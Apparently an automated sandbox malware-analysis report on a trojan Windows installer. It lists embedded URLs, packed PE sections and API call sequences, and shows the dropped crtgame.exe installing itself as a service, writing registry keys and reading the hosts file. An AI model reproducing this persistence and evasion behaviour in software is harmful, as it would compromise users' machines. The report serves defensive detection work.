                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-OGODD.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-1CHIA.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-1CHIA.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-GRQ3N.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-GSP1P.tmp.1.dr, is-MJ59N.tmp.1.dr, is-83310.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-1CHIA.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-1CHIA.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-DFCBR.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-PBK8V.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-04UN3.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-OGODD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-OGODD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-OGODD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-OGODD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-GSP1P.tmp.1.dr, is-83310.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-EQ4MD.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  barindex
                  Source: is-M7CIT.tmp.1.drStatic PE information: section name:
                  Source: is-M7CIT.tmp.1.drStatic PE information: section name:
                  Source: is-J3HC1.tmp.1.drStatic PE information: section name:
                  Source: is-J3HC1.tmp.1.drStatic PE information: section name:
                  Source: is-C877S.tmp.1.drStatic PE information: section name:
                  Source: is-C877S.tmp.1.drStatic PE information: section name:
                  Source: is-LTIA8.tmp.1.drStatic PE information: section name:
                  Source: is-AT6AE.tmp.1.drStatic PE information: section name:
                  Source: is-AT6AE.tmp.1.drStatic PE information: section name:
                  Source: is-001GJ.tmp.1.drStatic PE information: section name:
                  Source: is-001GJ.tmp.1.drStatic PE information: section name:
                  Source: is-MJ59N.tmp.1.drStatic PE information: section name:
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-P0GV3.tmp.1.drStatic PE information: section name:
                  Source: is-P0GV3.tmp.1.drStatic PE information: section name:
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-40N44.tmp.1.drStatic PE information: section name:
                  Source: is-40N44.tmp.1.drStatic PE information: section name:
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name:
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name:
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-L705K.tmp.1.drStatic PE information: section name:
                  Source: is-L705K.tmp.1.drStatic PE information: section name:
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_02391EE01_2_02391EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_023911401_2_02391140
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_023916B01_2_023916B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004010514_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_00401CBD4_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5BFDE6_2_02C5BFDE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C5BFD96_2_02C5BFD9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C25F2A6_2_02C25F2A
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C2EA196_2_02C2EA19
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3E0856_2_02C3E085
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C428A46_2_02C428A4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C399646_2_02C39964
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C449196_2_02C44919
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C44E906_2_02C44E90
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C25EB76_2_02C25EB7
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3D7796_2_02C3D779
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3A71A6_2_02C3A71A
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C37F226_2_02C37F22
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3DC6D6_2_02C3DC6D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C44E20 appears 139 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02C385C0 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: String function: 00456F08 appears 91 times
                  Source: Mg5bMQ2lWi.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Mg5bMQ2lWi.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: Mg5bMQ2lWi.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: Mg5bMQ2lWi.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: Mg5bMQ2lWi.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-TGPT7.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-TGPT7.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-TGPT7.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-TGPT7.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: TAudioClass.exe.4.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-EI90O.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-GRQ3N.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-EI0VO.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-FBHLC.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-EQ4MD.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: is-PBK8V.tmp.1.drStatic PE information: Number of sections : 18 > 10
                  Source: is-JB8NH.tmp.1.drStatic PE information: Number of sections : 11 > 10
                  Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Mg5bMQ2lWi.exe
                  Source: Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Mg5bMQ2lWi.exe
                  Source: Mg5bMQ2lWi.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: TAudioClass.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-M7CIT.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-001GJ.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-3DBAJ.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-P0GV3.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-KR7LG.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-HVEOK.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-GSP1P.tmp.1.drBinary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@15/128@7/3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C302E0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,6_2_02C302E0
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455328
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00402548
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0046D118 GetVersion,CoCreateInstance,1_2_0046D118
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA,4_2_004026F0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGameJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeMutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeFile created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: is-PBK8V.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-PBK8V.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-PBK8V.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-PBK8V.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-PBK8V.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-PBK8V.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-PBK8V.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-PBK8V.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-PBK8V.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: Mg5bMQ2lWi.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeFile read: C:\Users\user\Desktop\Mg5bMQ2lWi.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Mg5bMQ2lWi.exe "C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
